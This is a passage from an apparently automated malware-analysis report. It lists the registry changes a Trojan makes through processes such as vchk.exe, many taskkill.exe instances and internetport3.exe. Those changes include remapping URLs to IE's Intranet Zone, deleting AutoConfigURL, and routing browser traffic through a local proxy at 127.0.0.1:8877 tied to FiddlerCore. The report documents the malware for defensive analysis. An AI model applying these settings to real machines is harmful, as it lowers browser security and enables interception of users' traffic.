The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:
"IntranetName" = "1"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
The process vchk.exe:1656 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "78 DF 5D 88 D3 C3 F1 C6 1B 98 5E D6 E9 1B C3 E7"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
The process taskkill.exe:216 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "87 93 BC A3 D3 D7 49 8B F7 E4 D5 3C E0 03 0F 6C"
The process taskkill.exe:1140 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "00 F6 22 74 4D 10 C4 F9 83 65 EF 28 AF FB 81 EC"
The process taskkill.exe:668 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "1F 94 A3 50 FF 0C F5 68 7B AE CC 12 9E 62 F6 D0"
The process taskkill.exe:136 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "03 73 F9 29 97 97 A9 82 13 52 68 C1 99 28 22 82"
The process taskkill.exe:492 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "DC 19 93 EE E8 E1 6A AA 91 E8 A3 60 CC 69 2F 55"
The process taskkill.exe:1832 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "61 39 6D B2 A3 4D A0 55 90 E9 12 1A 3A 22 E8 A1"
The process taskkill.exe:1836 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "B8 20 3F 7F 9A 47 B5 2B 54 FE 2B CC 78 8B 6A E2"
The process taskkill.exe:1772 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F7 6C F5 87 CA FA 26 E6 73 67 20 17 B2 E5 66 17"
The process taskkill.exe:1548 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A4 59 05 39 97 E4 56 EF CF 4B 88 CB 0E BD 6E E9"
The process taskkill.exe:1372 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "56 6D 7A 46 50 74 95 31 F8 4C 58 3A 6F 79 47 C9"
The process taskkill.exe:936 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "10 2B DC 50 7A B8 79 89 C2 DE C6 17 59 1B A3 FA"
The process taskkill.exe:2012 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "47 B4 CA E1 60 FE 67 B4 3C E1 99 A6 D5 91 EF 78"
The process taskkill.exe:1096 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "5A 2C A1 7F C9 FD 11 D0 31 89 6B F4 AA BD B0 71"
The process taskkill.exe:628 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "CD 81 65 BA 79 FE C4 93 D9 75 0F 90 04 FC 06 56"
The process taskkill.exe:1092 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "34 15 F3 3E C8 38 09 C4 88 A7 08 E1 A3 5B 30 73"
The process taskkill.exe:1492 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "C7 D7 1E 8A D6 AC 3C AD 29 88 C7 FA 1E 9A F1 7B"
The process taskkill.exe:1956 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "96 63 70 2C 0D 0D 17 5C 31 7C 58 75 FC BB 89 7B"
The process taskkill.exe:1952 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "2D 23 27 12 99 BB F7 97 96 01 9F 9A 3E 33 E0 9E"
The process taskkill.exe:828 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "E1 7E 4F 72 77 3F 2A BE 9F 17 87 32 67 B5 95 0F"
The process taskkill.exe:1668 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "85 E1 1D F6 B4 B8 E1 BD 2F 00 EE F2 68 0C F8 90"
The process taskkill.exe:820 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "FF 84 93 49 3D 10 16 72 7C BC 36 CD 61 23 4C 7D"
The process taskkill.exe:376 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "4F A8 D1 53 8B 36 BB 38 AA A3 1E 28 08 19 E6 EE"
The process taskkill.exe:596 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "0B 6F 23 3A 08 4F 0D 3D B3 43 81 3F CF DA 00 44"
The process taskkill.exe:1124 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A8 8A CF 16 44 53 62 3F 85 F7 AE 4C 63 0A 18 9D"
The process taskkill.exe:316 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "B2 E6 31 36 08 B2 B0 4F 25 4E 82 92 54 61 61 D8"
The process taskkill.exe:1088 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "77 EC D0 A2 BC A8 1B EF FD 94 52 12 45 B0 1A AA"
The process taskkill.exe:1928 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "6B 16 DC 5D 9F 2F 17 AF 45 64 C4 63 C4 BF 4B 7C"
The process taskkill.exe:1852 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "4E 76 07 CA F7 88 2A 9A 9A D2 05 00 9B 6B 59 C5"
The process taskkill.exe:1856 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "4B 4B 76 F5 3E EA E2 9C 63 B3 AF 8A 53 E1 E4 EE"
The process taskkill.exe:1252 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "31 3E 23 20 D3 8B 0E 85 12 6F B7 B4 E7 EE FD BA"
The process taskkill.exe:1016 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "38 C1 E2 D7 BE 9B F3 C9 18 0E 95 DE 1B FA 86 11"
The process taskkill.exe:916 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "59 4C E1 12 A1 31 3C B7 2E 9F 46 D7 AF C9 AE 80"
The process taskkill.exe:1656 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "02 61 58 2A 86 33 C3 FD 9B 06 CC 0A F9 25 7F 69"
The process taskkill.exe:308 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "11 0C B5 11 01 30 CF B0 F5 14 AA 12 F2 14 AA BB"
The process taskkill.exe:448 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "17 B8 00 FA DA E7 82 01 47 3C 00 15 E0 0B 73 91"
The process taskkill.exe:1232 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "3B 4D 80 67 1E 33 A9 F0 FC 00 9A 03 2E 27 A7 C9"
The process taskkill.exe:440 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "AC 16 19 B5 66 63 2A 7F B8 58 F7 71 8A AD E4 69"
The process taskkill.exe:1136 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "CF C1 4E B3 2E CA 3C 92 43 BC 00 27 EA BB DC 82"
The process taskkill.exe:1932 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "7B BA 3D 48 57 06 1C D6 C4 CD 87 8E 59 90 75 99"
The process taskkill.exe:908 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "C5 A5 B0 1C 41 B8 DD CA 36 1A 6D 68 97 AB 9D F6"
The process taskkill.exe:1240 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "7B 15 48 C9 FC 56 45 01 AF FF DF 59 C9 DB 4B 72"
The process taskkill.exe:648 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "97 ED 98 96 0E 04 6D 27 78 D8 C8 25 9D A6 99 2B"
The process taskkill.exe:1632 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "71 FE 50 94 AD 5C 87 09 90 97 60 5F 88 D6 8D 58"
The process taskkill.exe:516 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "CA 35 25 80 D7 C2 C3 1F B5 B9 D2 CE 50 74 09 9F"
The process taskkill.exe:1348 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "CE AF 74 7E A0 DB 95 43 E8 C8 68 F1 EF 09 7A 52"
The process taskkill.exe:1340 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "59 D0 44 1F 2F 5F BF 6D A7 47 3C BB 9C 1A 85 CC"
The process taskkill.exe:336 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "7A DD 3A 77 E9 A5 AD 1C 3B 9A E3 F5 D6 22 03 65"
The process taskkill.exe:576 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F9 4C 6E 06 63 04 E3 31 E3 CE DF 93 48 C9 EE 56"
The process taskkill.exe:856 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "22 50 68 5C 76 40 A3 2F 27 50 C2 F9 52 98 08 C1"
The process taskkill.exe:1424 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "9F 0B 9E 71 1F D2 1D 8A 73 67 63 2E 10 1A 49 DB"
The process taskkill.exe:1980 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F9 13 8E 79 4B 09 FF 11 F5 59 FB 54 A6 B0 B1 F6"
The process taskkill.exe:1584 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "08 BA EE 65 F3 44 F6 B4 AD D5 64 1B D3 07 EA B8"
The process taskkill.exe:652 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "30 E7 EF 88 98 A3 94 9E F8 3F ED B8 32 1E 41 A3"
The process taskkill.exe:508 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "98 18 AC 72 96 FC 82 D6 2B EC C0 B6 53 F4 F8 15"
The process taskkill.exe:480 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "36 62 99 B2 6F A1 97 4A D4 20 42 C1 72 49 A4 13"
The process taskkill.exe:568 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "C5 C0 16 16 73 53 58 25 19 CD A4 42 24 2D 33 77"
The process taskkill.exe:468 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "77 6C 29 D1 81 96 03 8C 49 48 01 FB 8A 8C F8 D4"
The process taskkill.exe:464 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "FF 61 DA B0 A6 ED 57 25 AB E1 42 DA 5E D2 F5 07"
The process taskkill.exe:564 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "18 53 1B C8 C2 F6 3A 1F 7F F0 71 C0 5B D3 87 98"
The process taskkill.exe:1804 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A3 62 98 B3 40 07 F7 BD 0A A6 CA 5E AA 96 E3 32"
The process taskkill.exe:168 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "B3 3A EC 96 6C 63 63 87 13 D3 ED D7 9F B9 D6 F7"
The process taskkill.exe:228 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "35 F7 A2 EE 48 DE C9 4B 41 DA C6 5C 60 7A 15 94"
The process taskkill.exe:1868 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "BB 7B 47 4A 4B 47 26 9D 61 46 4E B1 9E 09 AA 80"
The process taskkill.exe:224 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "6D C4 89 E2 30 39 43 20 7D 4E B0 7F 67 27 51 CD"
The process taskkill.exe:1916 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "D8 6E 2F 89 A4 37 DE 11 E4 0E D9 C8 6A 44 52 7B"
The process taskkill.exe:968 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "4C F1 6C 10 FD 62 E0 F5 F4 77 E3 A8 51 D7 D0 5C"
The process taskkill.exe:1180 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "71 51 54 07 6E 73 DB B3 B2 A0 E1 91 C7 14 0F 74"
The process taskkill.exe:1456 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "CE 93 D3 2B E5 AA 57 9E 1A ED 1B 47 B8 B5 33 00"
The process taskkill.exe:1748 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "80 F4 D9 BB 9B AF 63 C8 B1 AB 96 70 37 4B E1 72"
The process taskkill.exe:1740 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "EB 05 C9 C4 34 FC 1F AF B7 49 80 4A 75 CD 37 66"
The process taskkill.exe:740 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "2F 23 7C 0F 36 E4 01 12 58 88 0B FC FB 85 2A 21"
The process taskkill.exe:1160 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "0C 04 97 F5 53 B0 CE ED 13 F0 0D 42 B9 D5 62 1E"
The process taskkill.exe:884 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "33 F1 22 73 48 15 1B 8F 5F 6A 12 E2 7A D3 9C 08"
The process taskkill.exe:1204 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "FB A1 30 89 76 82 71 20 73 DD 68 0B 1D E3 84 5B"
The process taskkill.exe:608 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "B1 DB FC 98 CE F7 8F E2 20 4C E2 FF 96 87 46 06"
The process taskkill.exe:552 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A5 E3 6C E6 0A C8 17 8A 17 27 C0 17 C4 4C AD E8"
The process taskkill.exe:1968 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "42 53 47 38 DF B3 07 EF EA 21 B0 AB E0 A3 E9 87"
The process taskkill.exe:872 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "51 CF 15 73 59 C5 38 79 A5 DD 84 F7 C2 52 AF 0C"
The process taskkill.exe:956 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "08 A6 D7 4E 60 0B A8 25 74 B4 A7 0B 81 70 E7 8E"
The process taskkill.exe:320 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "48 9A B3 3C 8D 61 25 70 80 61 E0 46 65 C1 50 18"
The process taskkill.exe:1112 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "B5 5E B0 51 14 00 D7 6F 6E EE AF 81 56 44 26 D6"
The process taskkill.exe:324 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "8E CD 6C A2 0C 76 14 2C F1 96 15 C7 D4 BA B5 FC"
The process taskkill.exe:1752 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "AD 21 4F 9F F3 9E 16 F8 9C 1F 91 77 A8 53 F4 07"
The process taskkill.exe:612 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F0 5D 34 7C 62 EB 71 8A 42 C9 72 77 81 7A B8 2B"
The process taskkill.exe:1888 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "99 14 C8 2E C5 DC 78 88 87 94 9D 6D FA C8 B7 74"
The process taskkill.exe:1884 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "5C 4B 37 E6 2D 1B 30 A5 E6 D3 C6 A0 73 ED 26 41"
The process taskkill.exe:1760 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "6C AE B0 25 BE A2 47 B9 2B B6 96 E8 28 A9 0C F4"
The process taskkill.exe:1880 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "2F 20 1E 2A 8C 91 DB AA 03 1A F1 5C C4 7B 0F DB"
The process taskkill.exe:1284 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "BF B5 47 57 95 4D D4 18 D1 5B 37 FB 92 0F 88 2F"
The process taskkill.exe:512 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "C0 02 1B B6 F4 97 51 5C F8 A8 31 30 70 4E C0 EE"
The process taskkill.exe:1472 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "74 A4 B2 83 82 78 F4 E3 86 9B 8A 55 29 FA 16 7B"
The process taskkill.exe:808 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "D9 E2 12 93 66 9A 80 ED 10 8E EA B3 FC 40 37 80"
The process taskkill.exe:2008 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "0F 5E 05 11 5B 8C 1E C6 22 66 0B A8 A8 36 6E 50"
The process taskkill.exe:1368 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "46 E7 35 FA F2 2F F3 BC 55 20 A1 EF 8A 38 BC DD"
The process internetport3.exe:360 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"Guid" = "8aefce96-4618-42ff-a057-3536aa78233e"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"EventMessageFile" = "%System%\ESENT.dll"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1B 00 00 00 03 00 00 00 28 00 00 00"
[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryCount" = "16"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\ESENT\Process\internetport3\DEBUG]
"Trace Level" = ""
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"ControlFlags" = "1"
"LogSessionName" = "stdout"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"DefaultConnectionSettings" = "3C 00 00 00 03 00 00 00 03 00 00 00 28 00 00 00"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride" = ""
"ProxyServer" = "http=127.0.0.1:8877;https=127.0.0.1:8877;"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"LogSessionName" = "stdout"
"ControlFlags" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "C4 40 D6 28 4C 09 7F ED B5 BC 80 8E C2 82 82 B1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryMessageFile" = "%System%\ESENT.dll"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"LogSessionName" = "stdout"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKCU\Software\Microsoft\FiddlerCore\Dynamic]
